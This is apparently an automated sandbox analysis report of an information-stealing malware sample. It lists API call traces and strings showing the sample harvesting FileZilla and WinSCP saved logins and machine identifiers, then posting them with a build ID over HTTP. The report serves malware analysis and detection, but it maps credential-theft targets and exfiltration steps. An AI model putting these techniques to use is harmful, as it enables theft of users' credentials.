                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,?,008E14F3,avghookx.dll,008F9D23), ref: 008E14CF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1586166983-0

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E5441
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3AB9: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,008E543A,?,?,?,?), ref: 008F3AD9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3AB9: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 008F3AE6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3AB9: RtlAllocateHeap.NTDLL(00000000), ref: 008F3AED
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00917A3B,00917A3A,00917A37,00917A2F), ref: 008E54B0
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E54D2
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E55E8
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 008E562C
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E565E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,",file_data,00918A18,------,00918A0C,?,",00918A00,------,009189F4,635b5ceb8ed09951eb8d5e776815ad72,",build_id,009189DC,------), ref: 008E5B8F
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E5BA2
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E5BBA
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E5BC1
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E5BCE
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E5BDC
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?), ref: 008E5BF1
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E5BFE
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E5C0C
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E5C1A
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E5C2D
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E5C42
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 008E5C55
                                                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 008E5C97
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 008E5D4E
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,block), ref: 008E5D63
                                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 008E5D6E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocateOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                                                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$635b5ceb8ed09951eb8d5e776815ad72$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                                                                                    • API String ID: 4232923880-2091041255
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d94445ed71f065b383326199e5ec8efcfc5097a635ab3f6e1771aae64ab80d7b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 62de4fa9e8291eac559e27c17ccd219f023ba0fb79a07f2b2e7cbbf956ae177b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d94445ed71f065b383326199e5ec8efcfc5097a635ab3f6e1771aae64ab80d7b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A442937291016D9ADF20FB29DC42ADDB7B8FF44304F0585E1A648B3222DA717F969F81

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008EF77A
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,009179E7,009179D7,009179D6,009179D3), ref: 008EF7C0
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008EF7C7
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 008EF7DB
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EF7E6
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 008EF81A
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EF825
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 008EF853
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EF85E
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008EF88C
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EF897
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EF902
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EF916
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(008EFCF9), ref: 008EFA3E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcpy$File$AllocCreateHeapLocallstrcat$AllocateCloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 1004949264-935134978
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8d89f12325945b8f9f067ed7ddc0c8b5d12b2a9509a5a1fa8ddf82945cf97c71
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a972738219656d855fe8b2e84f77f8b4b6581b5ec6bd1a79aac0e730bf1fb44b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d89f12325945b8f9f067ed7ddc0c8b5d12b2a9509a5a1fa8ddf82945cf97c71
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1A11732A4011DABCB00BBB5EC4ADDE7B78FF05705F110461FB01F7162DA71AA568BA2

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1114 8ef182-8ef22d call 905490 * 4 RegOpenKeyExA 1123 8ef6b4-8ef6ca call 8e1cce call 8fe88c 1114->1123 1124 8ef233-8ef25e RegGetValueA 1114->1124 1125 8ef283-8ef289 1124->1125 1126 8ef260-8ef266 1124->1126 1125->1126 1129 8ef28b-8ef291 1125->1129 1126->1123 1128 8ef26c-8ef27e RegCloseKey 1126->1128 1128->1123 1131 8ef2a5-8ef2bd RegOpenKeyExA 1129->1131 1132 8ef293-8ef29f RegCloseKey 1129->1132 1131->1123 1134 8ef2c3-8ef2e4 RegEnumKeyExA 1131->1134 1132->1131 1134->1126 1136 8ef2ea-8ef2f5 call 8f2143 1134->1136 1138 8ef2fa-8ef3d9 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 RegGetValueA call 8f2265 call 8f21e9 call 8e2910 RegGetValueA 1136->1138 1157 8ef3db-8ef427 call 8f424c call 8f2223 call 8f21e9 call 8e2910 * 2 1138->1157 1158 8ef429-8ef450 call 8f2265 call 8f21e9 call 8e2910 1138->1158 1170 8ef455-8ef565 call 8f2265 call 8f21e9 call 8e2910 RegGetValueA call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 RegGetValueA call 8f2265 call 8f21e9 call 8e2910 StrCmpCA 1157->1170 1158->1170 1199 8ef5cd-8ef632 call 8f2265 call 8f21e9 call 8e2910 RegEnumKeyExA 1170->1199 1200 8ef567-8ef58c call 8eec8f 1170->1200 1199->1138 1214 8ef638-8ef694 call 8e1ced lstrlen call 8f2143 call 8f8be6 call 8e2910 1199->1214 1206 8ef58e 1200->1206 1207 8ef590-8ef5c7 call 8f2265 call 8f21e9 call 8e2910 call 8f045e 1200->1207 1206->1207 1207->1199 1228 8ef6a9-8ef6af call 8e2910 1214->1228 1229 8ef696-8ef6a2 RegCloseKey 1214->1229 1228->1123 1229->1228
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EF1B3
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EF1D3
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EF1E4
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EF1F5
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008EF229
                                                                                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 008EF25A
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008EF272
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008EF299
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008EF2B9
                                                                                                                                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 008EF2DC
                                                                                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,009179CA), ref: 008EF375
                                                                                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 008EF3D5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                                                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 463713726-2798830873

Control-flow Graph
[Control-flow graph beginning at block 8e5e61-8e5f26; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E5F00
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008E5F1E
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E60B6
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 008E60FA
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,",mode,00918AA0,------,00918A94,635b5ceb8ed09951eb8d5e776815ad72,",build_id,00918A7C,------,00918A70,",00918A64,------), ref: 008E6529
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E6538
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E6542
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E6549
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E6556
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E6564
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E6572
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E6580
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E658D
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E65A2
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 008E65B5
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000000C7,?), ref: 008E6616
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6626
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6632
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6644
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E612C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocateConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                                                                                    • String ID: "$"$"$------$------$------$------$635b5ceb8ed09951eb8d5e776815ad72$build_id$mode
                                                                                                                                                                                                                                                                                                                    • API String ID: 3306106941-2638894007

Control-flow Graph
[Control-flow graph beginning at block 8f58c3-8f62e2; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F291C: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,0091761F,?,?,?), ref: 008F2934
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F291C: RtlAllocateHeap.NTDLL(00000000), ref: 008F293B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F291C: GetLocalTime.KERNEL32(?), ref: 008F2947
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F291C: wsprintfA.USER32 ref: 008F2972
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: _memset.LIBCMT ref: 008F3263
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 008F3282
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 008F32A7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: RegCloseKey.ADVAPI32(?,?,?,?), ref: 008F32B3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: CharToOemA.USER32(?,?), ref: 008F32C7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 008F32FB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: _memset.LIBCMT ref: 008F332A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: lstrcat.KERNEL32(?,00000000), ref: 008F3352
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: lstrcat.KERNEL32(?,00917E68), ref: 008F336F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 008F2631
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008F2671
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 008F26C6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: RtlAllocateHeap.NTDLL(00000000), ref: 008F26CD
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(Path: ,009178BC,HWID: ,009178B0,GUID: ,009178A4,00000000,MachineID: ,00917894,00000000,Date: ,00917888,00917884,11.8,Version: ,0091761F), ref: 008F5B18
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3EE1: OpenProcess.KERNEL32(00000410,00000000,008F5B27,00000000,?), ref: 008F3F03
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3EE1: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008F3F1E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3EE1: CloseHandle.KERNEL32(00000000), ref: 008F3F25
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F278C: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27A0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F278C: RtlAllocateHeap.NTDLL(00000000), ref: 008F27A7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: __EH_prolog3_catch_GS.LIBCMT ref: 008F346A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: CoInitializeEx.COMBASE(00000000,00000000), ref: 008F347B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008F348C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: CoCreateInstance.COMBASE(00913F70,00000000,00000001,00913EA0,?), ref: 008F34A6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008F34DC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: VariantInit.OLEAUT32(?), ref: 008F3537
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: __EH_prolog3_catch.LIBCMT ref: 008F35FA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: CoInitializeEx.COMBASE(00000000,00000000), ref: 008F3609
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008F361A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: CoCreateInstance.COMBASE(00913F70,00000000,00000001,00913EA0,?), ref: 008F3634
